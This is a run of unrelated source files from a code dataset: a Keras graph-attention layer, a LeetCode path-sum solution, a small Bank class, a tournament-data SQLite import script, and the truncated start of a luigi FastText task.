kernel_constraint=None,\n                 bias_constraint=None,\n                 attn_kernel_constraint=None,\n                 **kwargs):\n        super().__init__(channels, **kwargs)\n        if attn_heads_reduction not in {'concat', 'average'}:\n            raise ValueError('Possible reduction methods: concat, average')\n\n        self.channels = channels\n        self.attn_heads = attn_heads\n        self.attn_heads_reduction = attn_heads_reduction\n        self.dropout_rate = dropout_rate\n        self.activation = activations.get(activation)\n        self.use_bias = use_bias\n        self.kernel_initializer = initializers.get(kernel_initializer)\n        self.bias_initializer = initializers.get(bias_initializer)\n        self.attn_kernel_initializer = 
initializers.get(attn_kernel_initializer)\n self.kernel_regularizer = regularizers.get(kernel_regularizer)\n self.bias_regularizer = regularizers.get(bias_regularizer)\n self.attn_kernel_regularizer = regularizers.get(attn_kernel_regularizer)\n self.activity_regularizer = regularizers.get(activity_regularizer)\n self.kernel_constraint = constraints.get(kernel_constraint)\n self.bias_constraint = constraints.get(bias_constraint)\n self.attn_kernel_constraint = constraints.get(attn_kernel_constraint)\n self.supports_masking = False\n\n # Populated by build()\n self.kernels = [] # Layer kernels for attention heads\n self.biases = [] # Layer biases for attention heads\n self.kernels2 = [] # Layer kernels for attention heads\n self.biases2 = [] # Layer biases for attention heads\n self.attn_kernels = [] # Attention kernels for attention heads\n\n if attn_heads_reduction == 'concat':\n # Output will have shape (..., attention_heads * channels)\n self.output_dim = self.channels * self.attn_heads\n else:\n # Output will have shape (..., channels)\n self.output_dim = self.channels\n\n def build(self, input_shape):\n assert len(input_shape) >= 2\n input_dim = input_shape[0][-1]\n\n # Initialize weights for each attention head\n for head in range(self.attn_heads):\n # Layer kernel\n kernel = self.add_weight(shape=(input_dim, self.channels),\n initializer=self.kernel_initializer,\n regularizer=self.kernel_regularizer,\n constraint=self.kernel_constraint,\n name='kernel_{}'.format(head))\n self.kernels.append(kernel)\n kernel2 = self.add_weight(shape=(input_dim, self.channels),\n initializer=self.kernel_initializer,\n regularizer=self.kernel_regularizer,\n constraint=self.kernel_constraint,\n name='kernel_{}'.format(head))\n self.kernels2.append(kernel2)\n # Layer bias\n if self.use_bias:\n bias = self.add_weight(shape=(self.channels,),\n initializer=self.bias_initializer,\n regularizer=self.bias_regularizer,\n constraint=self.bias_constraint,\n name='bias_{}'.format(head))\n self.biases.append(bias)\n # Attention kernels\n attn_kernel_self = self.add_weight(shape=(self.channels, 1),\n initializer=self.attn_kernel_initializer,\n regularizer=self.attn_kernel_regularizer,\n constraint=self.attn_kernel_constraint,\n name='attn_kernel_self_{}'.format(head))\n attn_kernel_neighs = self.add_weight(shape=(self.channels, 1),\n initializer=self.attn_kernel_initializer,\n regularizer=self.attn_kernel_regularizer,\n constraint=self.attn_kernel_constraint,\n name='attn_kernel_neigh_{}'.format(head))\n self.attn_kernels.append([attn_kernel_self, attn_kernel_neighs])\n self.built = True\n\n def call(self, inputs):\n X = inputs[0] # Node features (N x F)\n A = inputs[1] # Adjacency matrix (N x N)\n\n outputs = []\n for head in range(self.attn_heads):\n kernel = self.kernels[head] # W in the paper (F x F')\n kernel2 = self.kernels2[head]\n attention_kernel = self.attn_kernels[head] # Attention kernel a in the paper (2F' x 1)\n\n # Compute inputs to attention network\n features = K.dot(X, kernel) # (N x F')\n features2 = K.dot(X, kernel2)\n # Compute feature combinations\n # Note: [[a_1], [a_2]]^T [[Wh_i], [Wh_2]] = [a_1]^T [Wh_i] + [a_2]^T [Wh_j]\n attn_for_self = K.dot(features, attention_kernel[0]) # (N x 1), [a_1]^T [Wh_i]\n attn_for_neighs = K.dot(features, attention_kernel[1]) # (N x 1), [a_2]^T [Wh_j]\n\n # Attention head a(Wh_i, Wh_j) = a^T [[Wh_i], [Wh_j]]\n if len(K.int_shape(features)) == 2:\n attn_for_neighs_T = K.transpose(attn_for_neighs)\n else:\n attn_for_neighs_T = K.permute_dimensions(attn_for_neighs, 
(0, 2, 1))\n dense = attn_for_self + attn_for_neighs_T\n\n # Add nonlinearity\n dense = LeakyReLU(alpha=0.2)(dense)\n\n # Mask values before activation (Vaswani et al., 2017)\n mask = -10e9 * (1.0 - A)\n dense += mask\n\n # Apply softmax to get attention coefficients\n dense = K.softmax(dense) # (N x N)\n\n # Apply dropout to features and attention coefficients\n dropout_attn = Dropout(self.dropout_rate)(dense) # (N x N)\n dropout_feat = Dropout(self.dropout_rate)(features) # (N x F')\n\n # Convolution\n node_features = filter_dot(dropout_attn, dropout_feat)\n node_features += features2 \n if self.use_bias:\n node_features = K.bias_add(node_features, self.biases[head])\n\n # Add output of attention head to final output\n outputs.append(node_features)\n\n # Aggregate the heads' output according to the reduction method\n if self.attn_heads_reduction == 'concat':\n output = K.concatenate(outputs) # (N x KF')\n else:\n output = K.mean(K.stack(outputs), axis=0) # N x F')\n\n output = self.activation(output)\n return output\n\n def compute_output_shape(self, input_shape):\n output_shape = input_shape[0][:-1] + (self.output_dim,)\n return output_shape\n\n def get_config(self):\n config = {\n 'channels': self.channels,\n 'attn_heads': self.attn_heads,\n 'attn_heads_reduction': self.attn_heads_reduction,\n 'dropout_rate': self.dropout_rate,\n 'activation': activations.serialize(self.activation),\n 'use_bias': self.use_bias,\n 'kernel_initializer': initializers.serialize(self.kernel_initializer),\n 'bias_initializer': initializers.serialize(self.bias_initializer),\n 'attn_kernel_initializer': initializers.serialize(self.attn_kernel_initializer),\n 'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),\n 'bias_regularizer': regularizers.serialize(self.bias_regularizer),\n 'attn_kernel_regularizer': regularizers.serialize(self.attn_kernel_regularizer),\n 'activity_regularizer': regularizers.serialize(self.activity_regularizer),\n 'kernel_constraint': constraints.serialize(self.kernel_constraint),\n 'bias_constraint': constraints.serialize(self.bias_constraint),\n 'attn_kernel_constraint': constraints.serialize(self.attn_kernel_constraint),\n }\n base_config = super().get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\nclass GlobalPooling(Layer):\n def __init__(self, **kwargs):\n if 'input_shape' not in kwargs and 'input_dim' in kwargs:\n kwargs['input_shape'] = (kwargs.pop('input_dim'),)\n super().__init__(**kwargs)\n self.supports_masking = True\n self.pooling_op = None\n\n def build(self, input_shape):\n if isinstance(input_shape, list) and len(input_shape) == 2:\n self.data_mode = 'graph'\n else:\n if len(input_shape) == 2:\n self.data_mode = 'single'\n else:\n self.data_mode = 'batch'\n super().build(input_shape)\n\n def call(self, inputs):\n if self.data_mode == 'graph':\n X = inputs[0]\n I = inputs[1]\n if K.ndim(I) == 2:\n I = I[:, 0]\n else:\n X = inputs\n\n if self.data_mode == 'graph':\n return self.pooling_op(X, I)\n else:\n return K.sum(X, axis=-2, keepdims=(self.data_mode == 'single'))\n\n def compute_output_shape(self, input_shape):\n if self.data_mode == 'single':\n return (1,) + input_shape[-1:]\n elif self.data_mode == 'batch':\n return input_shape[:-2] + input_shape[-1:]\n else:\n return input_shape[0] # Input shape is a list of shapes for X and I\n\n def get_config(self):\n return super().get_config()\n \nclass GlobalAttnSumPool(GlobalPooling):\n\n def __init__(self,\n attn_kernel_initializer='glorot_uniform',\n kernel_regularizer=None,\n 
attn_kernel_regularizer=None,\n attn_kernel_constraint=None,\n **kwargs):\n super().__init__(**kwargs)\n self.kernel_regularizer = regularizers.get(kernel_regularizer)\n self.attn_kernel_initializer = initializers.get(attn_kernel_initializer)\n self.attn_kernel_regularizer = regularizers.get(attn_kernel_regularizer)\n self.attn_kernel_constraint = constraints.get(attn_kernel_constraint)\n\n def build(self, input_shape):\n assert len(input_shape) >= 2\n if isinstance(input_shape, list) and len(input_shape) == 2:\n self.data_mode = 'graph'\n F = input_shape[0][-1]\n else:\n if len(input_shape) == 2:\n self.data_mode = 'single'\n else:\n self.data_mode = 'batch'\n F = input_shape[-1]\n # Attention kernels\n self.attn_kernel = self.add_weight(shape=(F, 1),\n initializer=self.attn_kernel_initializer,\n regularizer=self.attn_kernel_regularizer,\n constraint=self.attn_kernel_constraint,\n name='attn_kernel')\n\n self.built = True\n\n def call(self, inputs):\n if self.data_mode == 'graph':\n X, I = inputs\n if K.ndim(I) == 2:\n I = I[:, 0]\n else:\n X = inputs\n attn_coeff = K.dot(X, self.attn_kernel)\n attn_coeff = K.squeeze(attn_coeff, -1)\n attn_coeff = K.softmax(attn_coeff)\n if self.data_mode == 'single':\n output = K.dot(attn_coeff[None, ...], X)\n elif self.data_mode == 'batch':\n output = K.batch_dot(attn_coeff, X)\n else:\n output = attn_coeff[:, None] * X\n output = tf.segment_sum(output, I)\n\n return output\n\n def get_config(self):\n config = {\n 'attn_kernel_initializer': self.attn_kernel_initializer,\n 'kernel_regularizer': self.kernel_regularizer,\n 'attn_kernel_regularizer': self.attn_kernel_regularizer,\n 'attn_kernel_constraint': self.attn_kernel_constraint,\n }\n base_config = super().get_config()\n return dict(list(base_config.items()) + list(config.items()))","repo_name":"vinmuk/NFL-predict-yards","sub_path":"gcn_layer.py","file_name":"gcn_layer.py","file_ext":"py","file_size_in_byte":16977,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"31"} +{"seq_id":"17172013710","text":"# 113. 
Path Sum II\n# https://leetcode.com/problems/path-sum-ii/\n\n# 28 ms, faster than 94.70%\n# 16.1 MB, less than 63.24%\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n#     def __init__(self, val=0, left=None, right=None):\n#         self.val = val\n#         self.left = left\n#         self.right = right\nclass Solution(object):\n    def pathSumRec(self, root, targetSum, path, result):\n        if not root:\n            return\n        path.append(root.val)\n        if not root.left and not root.right and targetSum == root.val:\n            result.append(path[::])\n        else:\n            self.pathSumRec(root.left, targetSum - root.val, path, result)\n            self.pathSumRec(root.right, targetSum - root.val, path, result)\n        path.pop()\n    \n    def pathSum(self, root, targetSum):\n        \"\"\"\n        :type root: TreeNode\n        :type targetSum: int\n        :rtype: List[List[int]]\n        \"\"\"\n        result = []\n        self.pathSumRec(root, targetSum, [], result)\n        return result\n","repo_name":"DanielDionne/random_problems","sub_path":"leetcode/medium/113.py","file_name":"113.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6115045867","text":"# imports necessary classes from each file\r\nfrom Account_Final import Account\r\n\"\"\"\r\nBank class\r\n\r\nCreates an empty list to represent the bank and stores methods for adding to the bank, removing from the bank,\r\nfinding accounts in the bank, and adding monthly interest to all accounts.\r\n\"\"\"\r\nclass Bank():\r\n    # Defines the maximum accounts in the bank as 100\r\n    max_accounts = 100\r\n    \"\"\"\r\n    Constructor method\r\n\r\n    Creates a variable attribute to represent the bank.\r\n    \"\"\"\r\n    def __init__(self):\r\n        # An empty list to represent the bank\r\n        self.accounts = []\r\n    \"\"\"\r\n    addAccountToBank method\r\n\r\n    If the bank has fewer than 100 accounts, the new account will be added.\r\n    \"\"\"\r\n    def addAccountToBank(self, account):\r\n        if len(self.accounts) < self.max_accounts:\r\n            # Adds the account to the next open index in the bank\r\n            self.accounts.append(account)\r\n            return True\r\n        else:\r\n            # If the bank is full, report it and return False\r\n            print(\"No more accounts available\")\r\n            return False\r\n    \"\"\"\r\n    removeAccountFromBank method\r\n\r\n    Iterates through the bank to find the account and removes it.\r\n    \"\"\"\r\n    def removeAccountFromBank(self, account):\r\n        if account in self.accounts:\r\n            # Finds selected account in bank and removes it.\r\n            self.accounts.remove(account)\r\n            return True\r\n        else:\r\n            return False\r\n    \"\"\"\r\n    findAccount method\r\n\r\n    Iterates through the bank to find the account and returns it.\r\n    \"\"\"\r\n    def findAccount(self, account_number):\r\n        for account in self.accounts:\r\n            # Finds account in bank with matching account number.\r\n            if account.get_account_number() == account_number:\r\n                return account\r\n        return None\r\n    \"\"\"\r\n    addMonthlyInterest method\r\n\r\n    Iterates through the bank and adds the inputted interest to all accounts.\r\n    \"\"\"\r\n    def addMonthlyInterest(self, percent):\r\n        # Set yearly interest rate then divide by 12 to get monthly interest\r\n        monthlyInterestRate = percent / 12 \r\n        for account in self.accounts:\r\n            if account is not None:\r\n                balance = account.get_balance()\r\n                interest = balance * monthlyInterestRate\r\n                # Deposits the interest based on the calculation with the accounts balance.\r\n                account.deposit(interest)\r\n        print(f\"The monthly interest rate is now {monthlyInterestRate:.2f} 
%\")\r\n\r\n","repo_name":"Ryan-Richardson11/Banking-Application","sub_path":"FinalProject/Bank_Final.py","file_name":"Bank_Final.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"33200158299","text":"#!env python3\n\"\"\" Import script\n\"\"\"\n\nfrom base64 import b64encode\nfrom datetime import datetime\nfrom os import urandom\nimport configparser\nimport csv\nimport json\nimport os\nimport re\nimport sqlite3\nimport string\nimport sys\n\nclass Import(object):\n\n def __init__(self, db_file):\n if not db_file:\n raise Exception(\"No DB File\")\n\n self.db = sqlite3.connect(db_file)\n self.db.row_factory = sqlite3.Row\n\n # self.tid = self.__findTD()\n self.src_folder = None\n self.tid = None\n\n def setSource(self, src_folder):\n self.src_folder = src_folder\n\n def importAll(self, src_folder=None, clear=False):\n if not src_folder:\n src_folder = self.src_folder\n\n tid = self.__findTID(src_folder)\n self.tid = tid\n if not tid:\n raise Exception(\"Unable to locate TID\")\n\n if clear:\n self.__clearScores(tid)\n\n self.src_folder = src_folder\n\n teams = self.__importTeams(tid)\n teams_pods = self.__importPods(tid, teams=teams)\n if teams_pods:\n self.__importSchedule(tid, teams=teams_pods)\n else:\n self.__importSchedule(tid, teams=teams)\n self.__importGroups(tid)\n self.__importRankings(tid)\n self.__importParams(tid)\n self.__importRosters(tid, teams=teams)\n\n def __findTID(self, src_folder):\n tid = None\n tid_file = os.path.join(src_folder, \"tid\")\n tournament_cfg = os.path.join(src_folder, \"tournament.cfg\")\n if os.path.isfile(tid_file):\n with open(tid_file, 'r') as f:\n line = f.readline()\n try:\n tid = int(line)\n except ValueError:\n print(\"TID file has something other than an integer\")\n # sys.exit(1)\n return None\n elif os.path.isfile(tournament_cfg):\n t_config = configparser.RawConfigParser()\n t_config.read(tournament_cfg)\n\n name = t_config.get(\"tournament\", \"name\")\n short_name = t_config.get(\"tournament\", \"short_name\")\n start_date = t_config.get(\"tournament\", \"start_date\")\n end_date = t_config.get(\"tournament\", \"end_date\")\n location = t_config.get(\"tournament\", \"location\")\n\n if not name or not short_name or not start_date or not end_date or not location:\n raise Exception(\"Tournaments cfg missing reuqired field\")\n\n cur = self.db.execute(\"SELECT tid FROM tournaments WHERE short_name=?\", (short_name,))\n row = cur.fetchone()\n\n if row:\n return row['tid']\n else:\n cur = self.db.execute(\"INSERT INTO tournaments(name, short_name, start_date, end_date, location, active) VALUES(?,?,?,?,?,?)\",\n (name, short_name, start_date, end_date, location, 1))\n\n self.db.commit()\n cur = self.db.execute(\"SELECT tid FROM tournaments WHERE short_name=?\", (short_name,))\n row = cur.fetchone()\n\n if row:\n return row['tid']\n else:\n raise Exception(\"Unknown error inserting tournament into DB\")\n else:\n print(\"You need a tid file!\")\n # sys.exit(1)\n return None\n\n cur = self.db.execute('SELECT name FROM tournaments WHERE tid=?', (tid,))\n res = cur.fetchone()\n\n if res:\n print(\"\\n-- %s --\\n\" % res['name'])\n return tid\n else:\n print(\"Unkown TID\")\n # sys.exit(1)\n return None\n\n def __clearScores(self, tid):\n print(\"Clearing out scores ...\")\n self.db.execute('DELETE FROM scores WHERE tid=?', (tid,))\n self.db.commit()\n\n print(\"Clearing out parameters ...\")\n self.db.execute('DELETE FROM params WHERE tid=?', 
(tid,))\n        self.db.commit()\n\n    def __importSchedule(self, tid, sched_file=None, teams=None):\n        sched_file = os.path.join(self.src_folder, \"schedule.csv\")\n        if not os.path.isfile(sched_file):\n            return None\n\n        print(\"Found a schedule ...\")\n        cur = self.db.execute('DELETE FROM games WHERE tid=?', (tid,))\n        self.db.commit()\n\n        with open(sched_file, 'r') as f:\n            schedule = csv.DictReader(f)\n            for row in schedule:\n                # print \"%s %s vs %s\" % (row['gid'], row['black'],\n                # row['white'])\n\n                if not row['gid']:\n                    continue\n\n                # get the game ID number out of columns like #53\n                gid_match = re.match(r\".*?(\\d+)\", row['gid'])\n                #import pdb; pdb.set_trace()\n                if gid_match:\n                    gid = gid_match.group(1)\n                    gid = int(gid)\n                else:\n                    continue\n\n                #print \"Working on game %s\" % gid\n                if re.match('^\\d\\:\\d\\d', row['time']) is not None:\n                    row['time'] = \"0%s\" % row['time']\n\n                if row['white'].lower() == \"no game\" or row['black'].lower() == \"no game\":\n                    continue\n\n                white = self.__processGame(row['white'], teams, row['div'])\n                if not white:\n                    raise Exception(f\"Cannot parse white: {row['white']} for {row['gid']}\")\n\n                black = self.__processGame(row['black'], teams, row['div'])\n                if not black:\n                    raise Exception(f\"Cannot parse black: {row['black']} for {row['gid']}\")\n\n                pod = None\n                # this is broken from the conversion to JSON, if I need this again I need to fix it\n                # white var is like '{\"type\": \"team\", \"team_id\": \"2\"}' !! string\n                # if re.match(r\"T[\\d+]\", white) and re.match(r\"T[\\d+]\", black):\n                #     white_id = white.split(\"T\")[1]\n                #     div = teams[white_id]['div']\n                #     if 'pod' in teams[white_id]:\n                #         pod = teams[white_id]['pod']\n                #     else:\n                #         pod = None\n                # else:\n                #     div = row['div']\n                #     pod = row['pod']\n\n                date = None\n                try:\n                    date = datetime.strptime(row['date'], '%m/%d/%Y')\n                except ValueError:\n                    pass\n\n                if not date:\n                    try:\n                        date = datetime.strptime(row['date'], '%m/%d/%y')\n                    except ValueError:\n                        print(f\"[Error]\\tGame {gid} couldn't convert date with either attempt\")\n                        sys.exit(1)\n\n                if re.match(r\"^\\d\\d:\\d\\d$\", row['time']):\n                    time = datetime.strptime(row['time'], '%H:%M')\n                elif re.match(r\"^\\d\\d:\\d\\d:\\d\\d$\", row['time']):\n                    time = datetime.strptime(row['time'], '%H:%M:%S')\n                else:\n                    print(f\"[Error]\\tUnable to parse time for game {gid}\")\n                    continue\n\n                start_time = datetime.combine(\n                    datetime.date(date), datetime.time(time))\n\n                div = row['div']\n                if not div:\n                    if row['type'] == \"RR\":\n                        white_team = json.loads(white)\n                        white_id = white_team['team_id']\n                        div = teams[white_id]['div']\n\n                # if not div:\n                #     raise Exception(f\"missing division for game: {gid}\")\n\n                if not row['type']:\n                    print(f\"[Warn]\\tGame {gid} has no type\", file=sys.stderr)\n\n                cur = self.db.execute(\"INSERT INTO games(tid, gid, day, start_time, pool, black, white, division, pod, type, description) VALUES(?,?,?,?,?,?,?,?,?,?,?)\",\n                                      (tid, gid, row['day'], start_time, row['pool'], black, white, div, pod, row['type'], row['desc']))\n                self.db.commit()\n\n    def __processGame(self, game_string, teams=None, division=None):\n        orig_string = game_string\n\n        # print(game_string)\n        m = re.match(\"^(\\d+)\\s*[sS]eed\\s*(\\w+)\", game_string)\n        if m:\n            seed = m.group(1)\n            group = m.group(2)\n            group = group[:1]\n            parsed = json.dumps({\"type\": \"seed\", \"group\": group, \"seed\": seed})\n            return parsed\n            # return \"S%s%s\" % (pod, seed)\n\n        m = re.match(\"^(\\w+)\\s*[sS]eed\\s*(\\d+)\", game_string)\n        if m:\n            pod = m.group(1)\n            #pod = pod[:1] # nations 2019, you should remove this\n            seed = 
m.group(2)\n            parsed = json.dumps({\"type\": \"seed\", \"group\": pod, \"seed\": seed})\n            return parsed\n            # return \"S%s%s\" % (pod, seed)\n\n        m = re.match(\"^Open(\\d+)$\", game_string)\n        if m:\n            seed = m.group(1)\n            parsed = json.dumps({\"type\": \"seed\", \"group\": \"O\", \"seed\": seed})\n            return parsed\n\n        m = re.match(\"^[l|L].*?(\\d+)\", game_string)\n        if m:\n            # game_string = \"L%s\" % m.group(1)\n            return json.dumps({\"type\": \"loser\", \"game\": m.group(1)})\n            # return game_string\n\n        m = re.match(\"^[w|W].*?(\\d+)\", game_string)\n        if m:\n            game_string = \"W%s\" % m.group(1)\n            return json.dumps({\"type\": \"winner\", \"game\": m.group(1)})\n            # return game_string\n\n\n        # worlds logic, just keeping around cause\n        # pieces = game_string.split()\n        # if len(pieces) == 2:\n        #     group = pieces[0]\n        #     name = pieces[1]\n        #     #import pdb; pdb.set_trace()\n        #     for team in teams:\n        #         #import pdb; pdb.set_trace()\n        #         if group == \"MM\" or group == \"MW\":\n        #             if teams[team]['short_name'] == name and teams[team]['div'] == group:\n        #                 game_string = \"T%s\" % team\n        #         elif group == \"MA\" or group == \"MB\":\n        #             if teams[team]['short_name'] == name and teams[team]['div'] == \"M\":\n        #                 game_string = \"T%s\" % team\n        #         elif group == \"WA\" or group == \"WB\":\n        #             if teams[team]['short_name'] == name and teams[team]['div'] == \"W\":\n        #                 game_string = \"T%s\" % team\n        #         else:\n        #             print \"Unknown group? %s \" % group\n        #     if not re.match(r\"T[\\d+]\", game_string):\n        #         import pdb; pdb.set_trace()\n        #     return game_string\n        # else:\n        #     print \"Not sure what happened: %s\" % pieces\n\n        # game_string = division + \" \" + game_string\n        team_id = self.__findTeam(game_string, teams)\n        if team_id:\n            return json.dumps({\"type\": \"team\", \"team_id\": team_id})\n\n        # Seed notation \"group #\"\n        m = re.match(r\"^(\\w+)\\s(\\d+)$\", game_string)\n        if m:\n            group = m.group(1)\n            seed = m.group(2)\n\n            return json.dumps({\"type\": \"seed\", \"group\": group, \"seed\": seed})\n            # return \"S%s%s\" % (group, rank)\n\n        m = re.match(r\"^(\\w+)(\\d)$\", game_string)\n        if m:\n            group = m.group(1)\n            seed = m.group(2)\n            return json.dumps({\"type\": \"seed\", \"group\": group, \"seed\": seed})\n\n        #import pdb; pdb.set_trace()\n        raise Exception(f\"Unable to process game string {game_string}\")\n\n    def __isUnique(self, game_string):\n        \"\"\" Tests if a team assignment already exists in the schedule, mostly for things like W## or L## \"\"\"\n        cur = self.db.execute(\"SELECT gid FROM games WHERE tid=? AND (white = ? 
or black = ?)\", (self.tid, game_string, game_string))\n game_id = cur.fetchone()\n if game_id:\n return False\n else:\n return True\n\n def __findTeam(self, team_name, teams_dict, division=None):\n team_id = None\n for id, team in teams_dict.items():\n if team['short_name'] == team_name or team['name'] == team_name:\n team_id = id\n break\n\n return team_id\n\n def __importTeams(self, tid, teams_file=None):\n team_file = os.path.join(self.src_folder, \"teams.csv\")\n if not os.path.isfile(team_file):\n return None\n print(\"Found list of teams ...\")\n cur = self.db.execute('DELETE FROM teams WHERE tid=?', (tid,))\n self.db.commit()\n\n cur = self.db.execute(\"SELECT short_name FROM tournaments WHERE tid=?\", (tid,))\n tournament = cur.fetchone()\n\n if tournament:\n short_name = tournament['short_name']\n else:\n short_name = tid\n\n teams_dict = {}\n with open(team_file, 'r') as f:\n teams = csv.DictReader(f)\n for row in teams:\n team_id = row['team_id']\n if not team_id:\n continue\n flag_file = None\n\n # worlds hack, delete me!!\n # team_name = \"%s %s\" % (row['div'], row['name'])\n # team_name = row['name']\n # teams_dict[team_id] = {'name': row['name'], 'short_name': row['short_name'], 'div': row['div']}\n #\n # # country = string.join(team_name.split(\" \")[1:], \" \")\n # country = country.lower().replace(\" \", \"_\")\n flag_file = \"/static/flags/%s/%s.png\" % (short_name, team_id)\n\n teams_dict[team_id] = {'name': row['name'], 'short_name': row['short_name'], 'div': row['div']}\n cur = self.db.execute(\"INSERT INTO teams(tid, team_id, name, short_name, division, flag_file) VALUES(?,?,?,?,?,?)\",\n (tid, row['team_id'], row['name'], row['short_name'], row['div'], flag_file))\n\n return teams_dict\n\n def __importRankings(self, tid, rankings_file=None):\n rankings_file = os.path.join(self.src_folder, \"rankings.csv\")\n if not os.path.isfile(rankings_file):\n return None\n\n print(\"Found rankings file ....\")\n cur = self.db.execute(\"DELETE FROM rankings WHERE tid=?\", (tid,))\n self.db.commit()\n\n with open(rankings_file, 'r') as f:\n rankings = csv.DictReader(f)\n for row in rankings:\n game = self.__processGame(row['game'])\n cur = self.db.execute(\"INSERT INTO rankings(tid, place, game, division) VALUES(?,?,?,?)\",\n (tid, row['place'], game, row['div']))\n self.db.commit()\n\n def __importGroups(self, tid, groups_file=None):\n groups_file = os.path.join(self.src_folder, \"groups.csv\")\n if not os.path.isfile(groups_file):\n return None\n\n print(\"Found groups file ....\")\n cur = self.db.execute(\"DELETE FROM groups WHERE tid=?\", (tid,))\n self.db.commit()\n\n with open(groups_file, 'r') as f:\n groups = csv.DictReader(f)\n for row in groups:\n if 'group_color' in row:\n group_color = row['group_color']\n else:\n group_color = None\n\n if 'pod_round' in row:\n pod_round = row['pod_round']\n else:\n pod_round = None\n\n cur = self.db.execute(\"INSERT INTO groups(tid,group_id,name,group_color, pod_round) VALUES(?,?,?,?,?)\",\n (tid, row['group_id'], row['name'], group_color, pod_round))\n self.db.commit()\n\n def __importPods(self, tid, pods_file=None, teams=None):\n pods_file = os.path.join(self.src_folder, \"pods.csv\")\n if not os.path.isfile(pods_file):\n return None\n\n print(\"Found pods file ...\")\n cur = self.db.execute(\"DELETE FROM pods WHERE tid=?\", (tid,))\n self.db.commit()\n\n with open(pods_file, 'r') as f:\n pods = csv.DictReader(f)\n for row in pods:\n cur = self.db.execute(\"INSERT INTO pods(tid, team_id, pod) VALUES(?,?,?)\",\n (tid, 
row['team_id'], row['pod']))\n                if teams:\n                    team_id = row['team_id']\n                    pod = row['pod']\n                    teams[team_id]['pod'] = pod\n\n            self.db.commit()\n\n        return teams\n\n    def __importParams(self, tid, params_file=None):\n        params_file = os.path.join(self.src_folder, \"params.cfg\")\n\n        if not os.path.isfile(params_file):\n            return None\n\n        print(\"Found params.cfg ...\")\n        params = configparser.RawConfigParser()\n        params.read(params_file)\n\n        for p in params.items('params'):\n            cur = self.db.execute(\"INSERT INTO params(tid, field, val) VALUES(?,?,?)\",\n                                  (tid, p[0], p[1]))\n        self.db.commit()\n\n    def __importRosters(self, tid, roster_file=None, teams=None):\n        if not roster_file:\n            roster_file = os.path.join(self.src_folder, \"rosters.csv\")\n        if not os.path.isfile(roster_file):\n            return None\n\n        print(\"Found rosters file ...\")\n        cur = self.db.execute(\"DELETE FROM rosters WHERE tid=?\", (tid,))\n        self.db.commit()\n\n        with open(roster_file, 'r') as f:\n            rosters = csv.DictReader(f)\n            team_name = None\n            team_id = None\n            for row in rosters:\n                if row['team']:\n                    team_name = row['team']\n                    team_id = self.__findTeam(team_name, teams)\n                    if not team_id:\n                        raise(Exception(\"Couldn't parse team name %s\" % team_name))\n\n                if not 'player_name' in row or not row['player_name']:\n                    continue\n                # if not 'first' in row or not row['first']:\n                #     continue\n\n                if not team_id:\n                    print(\"I forgot me team\")\n                    raise(Exception(\"I sucks\"))\n\n                player_name = row['player_name'].strip()\n                # player_name = \"%s %s\" % (row['first'].strip().title(), row['last'].strip().title())\n                # player_name = player_name.strip()\n\n                # stripping non-unicode characters, can't actually do this when I get real names with accents and what not, will need to fix\n                # player_name = ''.join([x for x in player_name if ord(x) < 128])\n                # name_parts = player_name.split(\" \")\n                # last_name = name_parts[-1]\n                # first_name = \" \".join(name_parts[:-1])\n                # player_name = \"%s, %s\" % (last_name, first_name)\n                try:\n                    player_name = player_name\n                except UnicodeDecodeError as e:\n                    import pdb; pdb.set_trace()\n                    raise(e)\n                # import pdb; pdb.set_trace()\n                cur = self.db.execute(\"SELECT player_id FROM players WHERE display_name=?\", (player_name,))\n                player = cur.fetchone()\n                player_id = None\n                if not player:\n                    while player_id is None:\n                        player_id = self.__genID()\n                        self.db.execute(\"SELECT player_id FROM players WHERE player_id=?\", (player_id,))\n                        exists = cur.fetchone()\n                        if exists:\n                            player_id = None\n\n                    self.db.execute(\"INSERT INTO players (player_id, display_name, date_created) VALUES (?,?,datetime('now'))\", (player_id, player_name))\n                    self.db.commit()\n\n                else:\n                    player_id = player['player_id']\n\n                cap_number = None\n                if re.match(r\"\\d+\", row['cap_number']):\n                    cap_number = int(row['cap_number'])\n                # if row['cap_number'] > 0:\n                #     cap_number = row['cap_number']\n\n                is_coach = False\n                coach_title = None\n                if 'designation' in row and row['designation']:\n                    designation = row['designation']\n                    if designation in [\"coach\", \"Coach\", \"Manager\", \"Support Staff\"]:\n                        is_coach = True\n                        coach_title = designation\n                try:\n                    cur = self.db.execute(\"INSERT INTO rosters (tid, player_id, team_id, cap_number, is_coach, coach_title) VALUES (?,?,?,?,?,?)\", (tid, player_id, team_id, cap_number, is_coach, coach_title))\n                    self.db.commit()\n                except sqlite3.IntegrityError as e:\n                    print(\"Error inserting player %s due to duplicate, team: %s, cap_number: %s\" % (player_name, team_id, cap_number))\n                    sys.exit(1)\n\n    def __genID(self):\n        return b64encode(urandom(6), 
b\"Aa\").decode(\"utf-8\")\n\nif __name__ == \"__main__\":\n \"\"\" Main function, uses sys.argv to pull in a directory, defaults to clear contents and full import\n \"\"\"\n src_folder = None\n try:\n src_folder = sys.argv[1].strip(\"/\")\n except IndexError:\n print(\"Must give me a directory to import\")\n sys.exit(1)\n\n if os.path.isdir(src_folder):\n print(\"Importing from directory %s\" % src_folder)\n else:\n print(\"Directory doesn't exist %s\" % src_folder)\n sys.exit(1)\n\n db_file = os.path.join('scoreboard/scores.db')\n\n importer = Import(db_file)\n importer.setSource(src_folder)\n importer.importAll(clear=True)\n sys.exit(0)\n","repo_name":"uwhscores/scoreboard","sub_path":"import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":21620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40275003385","text":"import os\nimport hashlib\nfrom functools import reduce\n\nimport luigi\nfrom luigi.util import requires, inherits\nfrom sklearn.externals import joblib\nfrom plumbum import local, FG\n\nfrom ..core import ExtractFeature, CoreParams\n\n\ndef concat_rowwise(x, y):\n return x + '|' + y\n\n\n@inherits(CoreParams)\nclass FastTextInput(luigi.Task):\n features = luigi.Parameter()\n\n @property\n def features_as_array(self):\n return self.features.split(',')\n\n 